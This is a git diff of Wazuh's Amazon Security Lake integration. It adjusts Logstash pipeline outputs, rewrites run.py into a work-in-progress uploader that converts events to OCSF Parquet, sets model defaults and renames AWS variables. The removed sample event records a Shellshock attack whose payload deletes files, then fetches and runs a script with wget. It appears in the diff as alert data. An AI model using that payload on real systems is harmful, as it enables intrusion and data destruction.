diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf index e9fdbb5da593b..1bee9afc62450 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf @@ -23,7 +23,7 @@ input { output { stdout { id => "output.stdout" - codec => rubydebug + codec => json_lines } file { id => "output.file" diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf index c165be2530f49..afd7712413ddf 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf @@ -20,11 +20,14 @@ input { } output { - pipe { - id => "securityLake" - message_format => "%{_source}" - ttl => "10" - command => "/env/bin/python3 /usr/share/logstash/amazon-security-lake/run.py -d" - # command => "/usr/share/logstash/amazon-security-lake/run.py --pushinterval 300 --maxlength 2000 --linebuffer 100 --sleeptime 1 --bucketname securitylake --s3endpoint s3.ninja:9000 --s3profile default" - } + stdout { + id => "output.stdout" + codec => json_lines + } + pipe { + id => "output.integrator" + ttl => "10" + command => "/env/bin/python3 /usr/share/logstash/amazon-security-lake/run.py" + # command => "/usr/share/logstash/amazon-security-lake/run.py --pushinterval 300 --maxlength 2000 --linebuffer 100 --sleeptime 1 --bucketname securitylake --s3endpoint s3.ninja:9000 --s3profile default" + } } diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf index 397a875144ae2..35f411b4429d9 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf @@ -22,7 +22,7 @@ input { output { stdout { id => "output.stdout" - codec => rubydebug + codec => json_lines } s3 { id => "output.s3" @@ -30,7 +30,7 @@ output { secret_access_key => "${AWS_SECRET}" region => "${AWS_REGION}" endpoint => "http://s3.ninja:9000" - bucket => "wazuh-indexer-amazon-security-lake-bucket" + bucket => "${AWS_BUCKET}" codec => "json" retry_count => 0 validate_credentials_on_root_bucket => false diff --git a/integrations/amazon-security-lake/src/run.py b/integrations/amazon-security-lake/src/run.py index 739c6a027432d..a1d948aa64587 100644 --- a/integrations/amazon-security-lake/src/run.py +++ b/integrations/amazon-security-lake/src/run.py @@ -1,227 +1,129 @@ -#!/env/bin/python3.9 +#!/env/bin/python3 # vim: bkc=yes bk wb -import os import sys -import argparse -import logging -import time -import json +import os import datetime -import boto3 import transform -from pyarrow import parquet, Table, fs - - -logging.basicConfig( - format='%(asctime)s %(message)s', - encoding='utf-8', - level=logging.DEBUG -) - -BLOCK_ENDING = {"block_ending": True} - - -def create_arg_parser(): - parser = argparse.ArgumentParser( - description='Wazuh\'s integrator module for Amazon Security Lake') - parser.add_argument( - '-d', - '--debug', - action='store_true', - help='Enable debug output' - ) - parser.add_argument( - '-b', - '--bucketname', - type=str, - action='store', - help='S3 bucket name to write parquet files to' - ) - parser.add_argument( - '-e', - '--s3endpoint', - type=str, - action='store', - default=None, - help='Hostname and port of the S3 destination (defaults to AWS\')' - ) - parser.add_argument( - '-i', - '--pushinterval', - type=int, - action='store', - default=299, - help='Time interval in seconds for pushing data to Security Lake' - ) - parser.add_argument( - '-l', - '--logoutput', - type=str, - default="/tmp/indexer-to-security-lake-data.txt", - help='File path of the destination file to write to' - ) - parser.add_argument( - '-m', - '--maxlength', - type=int, - action='store', - default=2000, - help='Event number threshold for submission to Security Lake' - ) - parser.add_argument( - '-n', - '--linebuffer', - type=int, - action='store', - default=100, - help='Stadndard input\'s line buffer length' - ) - parser.add_argument( - '-p', - '--s3profile', - type=str, - action='store', - default='default', - help='AWS profile as stored in credentials file' - ) - parser.add_argument( - '-s', - '--sleeptime', - type=int, - action='store', - default=5, - help='Input buffer polling interval' - ) - return parser - - -def s3authenticate(profile, endpoint=None, scheme='https'): - session = boto3.session.Session(profile_name=profile) - credentials = session.get_credentials() - - if endpoint != None: - scheme = 'http' - - s3fs = fs.S3FileSystem( - endpoint_override=endpoint, - access_key=credentials.access_key, - secret_key=credentials.secret_key, - scheme=scheme +import pyarrow as pa +import pyarrow.parquet as pq +import logging +import boto3 +from botocore.exceptions import ClientError + +# NOTE work in progress +def upload_file(file_name, bucket, object_name=None): + """Upload a file to an S3 bucket + + :param file_name: File to upload + :param bucket: Bucket to upload to + :param object_name: S3 object name. If not specified then file_name is used + :return: True if file was uploaded, else False + """ + + # session = boto3.Session( + # aws_access_key_id=os.environ['AWS_KEY'], + # aws_secret_access_key=os.environ['AWS_SECRET'] + # ) + s3 = boto3.resource( + 's3', + aws_access_key_id=os.environ['AWS_ACCESS_KEY_ID'], + aws_secret_access_key=os.environ['AWS_SECRET_ACCESS_KEY'], + region_name=os.environ['AWS_REGION'] ) - return s3fs - + # If S3 object_name was not specified, use file_name + if object_name is None: + object_name = os.path.basename(file_name) -def encode_parquet(list, bucketname, filename, filesystem): + # Upload the file + # s3_client = boto3.client('s3') try: - table = Table.from_pylist(list) - parquet.write_table( - table, - '{}/{}'.format(bucketname, filename), filesystem=filesystem - ) - except Exception as e: + # s3_client.upload_file(file_name, bucket, object_name) + s3.Bucket(os.environ['AWS_BUCKET']).upload_file() + except ClientError as e: logging.error(e) - raise - - -def map_block(fileobject, length): - output = [] - ocsf_event = {} - for line in range(0, length): - line = fileobject.readline() - if line == '': - output.append(BLOCK_ENDING) - break - # alert = json.loads(line) - # ocsf_event = converter.convert(alert) - - event = transform.converter.from_json(line) - print(event) - ocsf_event = transform.converter.to_detection_finding(event) - - output.append(ocsf_event) - return output - - -def timedelta(reference_timestamp): - current_time = datetime.datetime.now(datetime.timezone.utc) - return (current_time - reference_timestamp).total_seconds() - - -def utctime(): - return datetime.datetime.now(datetime.timezone.utc) + return False + return True + + +def main(): + '''Main function''' + # Get current timestamp + timestamp = datetime.datetime.now(datetime.timezone.utc).isoformat() + + # Generate filenames + filename_raw = f"/tmp/integrator-raw-{timestamp}.json" + filename_ocsf = f"/tmp/integrator-ocsf-{timestamp}.json" + filename_ocsf = f"/tmp/integrator-ocsf-{timestamp}.json" + filename_parquet = f"/tmp/integrator-ocsf-{timestamp}.parquet" + + # 1. Extract data + # ================ + raw_data = [] + for line in sys.stdin: + raw_data.append(line) + + # Echo piped data + with open(filename_raw, "a") as fd: + fd.write(line) + + # 2. Transform data + # ================ + # a. Transform to OCSF + ocsf_data = [] + for line in raw_data: + try: + # raw_event = json.loads(line) + event = transform.converter.from_json(line) + # ocsf_event = transform.converter.to_detection_finding(event) + ocsf_event = transform.converter.to_detection_finding(event) + ocsf_data.append(ocsf_event.model_dump()) + # Temporal disk storage + with open(filename_ocsf, "a") as fd: + fd.write(str(ocsf_event) + "\n") + except AttributeError as e: + print("Error transforming line to OCSF") + print(event) + print(e) -if __name__ == "__main__": + # b. Encode as Parquet try: - args = create_arg_parser().parse_args() - logging.info('BUFFERING STDIN') - - with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: - output_buffer = [] - loop_start_time = utctime() - - try: - s3fs = s3authenticate(args.s3profile, args.s3endpoint) - while True: + table = pa.Table.from_pylist(ocsf_data) + pq.write_table(table, filename_parquet) + # parquet.Parquet.to_file(table, filename_parquet) + except AttributeError as e: + print("Error encoding data to parquet") + print(e) - current_block = map_block(stdin, args.linebuffer) - - if current_block[-1] == BLOCK_ENDING: - output_buffer += current_block[0:-1] - time.sleep(args.sleeptime) - else: - output_buffer += current_block - - buffer_length = len(output_buffer) - - if buffer_length == 0: - continue - - elapsed_seconds = timedelta(loop_start_time) - - if buffer_length > args.maxlength or elapsed_seconds > args.pushinterval: - logging.info( - 'Elapsed seconds: {}'.format(elapsed_seconds)) - loop_start_time = utctime() - timestamp = loop_start_time.strftime('%F_%H.%M.%S') - filename = 'wazuh-{}.parquet'.format(timestamp) - logging.info( - 'Writing data to s3://{}/{}'.format(args.bucketname, filename)) - encode_parquet( - output_buffer, args.bucketname, filename, s3fs) - output_buffer = [] - - except KeyboardInterrupt: - logging.info("Keyboard Interrupt issued") - exit(0) - - logging.info('FINISHED RETRIEVING STDIN') - - except Exception as e: - logging.error("Error running script") - logging.error(e) - raise + # 3. Load data + # ================ + # parquet.parquet.Parquet.to_s3(table, filename_parquet) + upload_file(filename_parquet, os.environ['AWS_BUCKET']) def _test(): ocsf_event = {} with open("./wazuh-event.sample.json", "r") as fd: # Load from file descriptor - raw_event = json.load(fd) - try: - event = transform.converter.from_json(raw_event) - print(event) - ocsf_event = transform.converter.to_detection_finding(event) - print("") - print("--") - print("") - print(ocsf_event) + for raw_event in fd: + try: + event = transform.converter.from_json(raw_event) + print("") + print("-- Wazuh event Pydantic model") + print("") + print(event.model_dump()) + ocsf_event = transform.converter.to_detection_finding(event) + print("") + print("-- Converted to OCSF") + print("") + print(ocsf_event.model_dump()) - except KeyError as e: - raise (e) + except KeyError as e: + raise (e) if __name__ == '__main__': - _test() + main() + # _test() diff --git a/integrations/amazon-security-lake/src/transform/converter.py b/integrations/amazon-security-lake/src/transform/converter.py index 90f8eeef27bac..88477b0dae814 100644 --- a/integrations/amazon-security-lake/src/transform/converter.py +++ b/integrations/amazon-security-lake/src/transform/converter.py @@ -90,9 +90,16 @@ def to_detection_finding(event: models.wazuh.Event) -> models.ocsf.DetectionFind ) -def from_json(event: dict) -> models.wazuh.Event: +# def from_json(event: dict) -> models.wazuh.Event: +# # Needs to a string, bytes or bytearray +# try: +# return models.wazuh.Event.model_validate_json(json.dumps(event)) +# except pydantic.ValidationError as e: +# print(e) + +def from_json(event: str) -> models.wazuh.Event: # Needs to a string, bytes or bytearray try: - return models.wazuh.Event.model_validate_json(json.dumps(event)) + return models.wazuh.Event.model_validate_json(event) except pydantic.ValidationError as e: - print(e) + print(e) \ No newline at end of file diff --git a/integrations/amazon-security-lake/src/transform/models/wazuh.py b/integrations/amazon-security-lake/src/transform/models/wazuh.py index 34aa3c91e96e1..f73ed832b9165 100644 --- a/integrations/amazon-security-lake/src/transform/models/wazuh.py +++ b/integrations/amazon-security-lake/src/transform/models/wazuh.py @@ -6,27 +6,27 @@ class Mitre(pydantic.BaseModel): - technique: typing.List[str] = [] - id: typing.List[str] = "" - tactic: typing.List[str] = [] + technique: typing.List[str] = ["N/A"] + id: typing.List[str] = ["N/A"] + tactic: typing.List[str] = ["N/A"] class Rule(pydantic.BaseModel): firedtimes: int = 0 - description: str = "" + description: str = "N/A" groups: typing.List[str] = [] - id: str = "" + id: str = "N/A" mitre: Mitre = Mitre() level: int = 0 nist_800_53: typing.List[str] = [] class Decoder(pydantic.BaseModel): - name: str + name: str = "N/A" class Input(pydantic.BaseModel): - type: str + type: str = "N/A" class Agent(pydantic.BaseModel): @@ -39,9 +39,9 @@ class Manager(pydantic.BaseModel): class Event(pydantic.BaseModel): - rule: Rule = {} - decoder: Decoder = {} - input: Input = {} + rule: Rule = Rule() + decoder: Decoder = Decoder() + input: Input = Input() id: str = "" full_log: str = "" agent: Agent = {} diff --git a/integrations/amazon-security-lake/src/wazuh-event.sample.json b/integrations/amazon-security-lake/src/wazuh-event.sample.json index d7e0558b62c62..b161bf24db419 100644 --- a/integrations/amazon-security-lake/src/wazuh-event.sample.json +++ b/integrations/amazon-security-lake/src/wazuh-event.sample.json @@ -1,76 +1 @@ -{ - "input": { - "type": "log" - }, - "agent": { - "name": "redacted.com", - "id": "000" - }, - "manager": { - "name": "redacted.com" - }, - "data": { - "protocol": "GET", - "srcip": "000.111.222.10", - "id": "404", - "url": "/cgi-bin/jarrewrite.sh" - }, - "rule": { - "firedtimes": 1, - "mail": false, - "level": 6, - "pci_dss": [ - "11.4" - ], - "tsc": [ - "CC6.1", - "CC6.8", - "CC7.2", - "CC7.3" - ], - "description": "Shellshock attack attempt", - "groups": [ - "web", - "accesslog", - "attack" - ], - "mitre": { - "technique": [ - "Exploitation for Privilege Escalation", - "Exploit Public-Facing Application" - ], - "id": [ - "T1068", - "T1190" - ], - "tactic": [ - "Privilege Escalation", - "Initial Access" - ] - }, - "id": "31166", - "nist_800_53": [ - "SI.4" - ], - "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", - "gdpr": [ - "IV_35.7.d" - ] - }, - "location": "/var/log/nginx/access.log", - "decoder": { - "name": "web-accesslog" - }, - "id": "1707402914.872885", - "GeoLocation": { - "city_name": "Amsterdam", - "country_name": "Netherlands", - "region_name": "North Holland", - "location": { - "lon": 4.9087, - "lat": 52.3534 - } - }, - "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", - "timestamp": "2024-02-08T11:35:14.334-0300" -} \ No newline at end of file +{"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"agent":{"id":"003","ip":"10.0.0.180","name":"ip-10-0-0-180.us-west-1.compute.internal"},"@timestamp":"2024-03-14T12:57:05.730Z","data":{"audit":{"exe":"/usr/sbin/sshd","type":"NORMAL","cwd":"/home/wazuh","file":{"name":"/var/sample"},"success":"yes","command":"ssh"}},"@version":"1","manager":{"name":"wazuh-manager"},"location":"","decoder":{},"id":"1580123327.49031","predecoder":{},"timestamp":"2024-03-14T12:57:05.730+0000","rule":{"description":"Audit: Command: /usr/sbin/ssh","firedtimes":3,"level":3,"id":"80791","mail":false,"groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]}} \ No newline at end of file diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 1348b8bce56c6..0a1465d2e6d81 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -80,9 +80,10 @@ services: LOG_LEVEL: trace LOGSTASH_KEYSTORE_PASS: "SecretPassword" MONITORING_ENABLED: false - AWS_KEY: "AKIAIOSFODNN7EXAMPLE" - AWS_SECRET: "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY" + AWS_ACCESS_KEY_ID: "AKIAIOSFODNN7EXAMPLE" + AWS_SECRET_ACCESS_KEY: "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY" AWS_REGION: "us-east-1" + AWS_BUCKET: "wazuh-indexer-amazon-security-lake-bucket" ports: - "5000:5000/tcp" - "5000:5000/udp" @@ -91,7 +92,7 @@ services: volumes: - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline # TODO has 1000:1000. logstash's uid is 999 - ./certs/root-ca.pem:/usr/share/logstash/root-ca.pem - - ../amazon-security-lake/src:/usr/share/logstash/amazon-security-lake + - ../amazon-security-lake/src:/usr/share/logstash/amazon-security-lake # TODO use dedicated folder # - ./credentials:/usr/share/logstash/.aws/credentials # TODO credentials are not commited (missing) command: tail -f /var/log/logstash/logstash-plain.log